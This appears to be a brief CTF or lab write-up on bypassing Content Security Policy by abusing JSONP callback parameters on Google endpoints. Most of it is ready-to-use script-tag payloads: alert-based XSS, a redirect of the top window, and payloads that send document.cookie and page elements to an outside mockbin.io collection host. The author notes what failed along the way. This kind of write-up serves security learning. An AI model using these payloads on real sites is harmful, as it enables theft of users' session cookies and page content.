CSP - JSONP

Initial Attempt

<script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert`1`"></script>

Problem: Cannot quite control the argument easily

Achieve XSS by using one of the googleapi payloads from JSONBee

<script src="https://translate.googleapis.com/$discovery/rest?version=v3&callback=alert('xss');"></script>

Solution

Achieve redirection by defining your own function in the callback parameter

<script src="https://translate.googleapis.com/$discovery/rest?version=v3&callback=(function exploit(){window.top.location.href='https://google.com'})()"></script>

<script src="https://translate.googleapis.com/$discovery/rest?version=v3&callback=(function exploit(){window.top.location.href='https://b5e02d613ca44b7384e0290125a1448e.api.mockbin.io/?'.concat(document.cookie)})()"></script>

Problem: we need to exfiltrate the page not the cookie

<script src="https://translate.googleapis.com/$discovery/rest?version=v3&callback=(function exploit(){var p=document.getElementsByTagName('p')[0];window.top.location.href='https://b5e02d613ca44b7384e0290125a1448e.api.mockbin.io/?'.concat(p)})()"></script>

Problem: script works but returns a 400 INVALID_ARGUMENT error when appending .innerText to get the content of page

References

• JSONBee - ready to use JSONP endpoints
• Hacktricks - third party jsonp endpoints